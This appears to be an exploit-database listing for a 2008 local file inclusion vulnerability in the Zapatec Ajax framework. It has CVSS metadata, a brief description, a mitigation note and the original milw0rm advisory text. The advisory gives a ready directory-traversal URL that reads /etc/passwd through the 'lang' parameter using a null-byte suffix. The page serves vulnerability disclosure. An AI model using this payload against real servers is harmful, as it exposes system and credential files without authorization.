header-logo
Suggest Exploit
vendor:
Ajax framework
by:
dun
8.5
CVSS
HIGH
Local File Include
22
CWE
Product Name: Ajax framework
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Ajax framework by www.zapatec.com Local File Include Vulnerability

A vulnerability was discovered in the Ajax framework by www.zapatec.com, which allows an attacker to include a local file. This is done by manipulating the 'lang' parameter in the URL, which is not properly sanitized before being used. This can be exploited to include arbitrary files from local resources via directory traversal attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.eu ]


###############################################################################
 #  [  Ajax framework by www.zapatec.com ]   Local File Include Vulnerability  #

###############################################################################
 #
 # Script site: http://www.zapatec.com/
 # 
 # Vuln: 
 # http://site.com/?lang=../../../../../../../../../../../../../../etc/passwd%00
 #      
 #
 ###############################################
 # Greetz: D3m0n_DE * sid_psycho * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-05-18]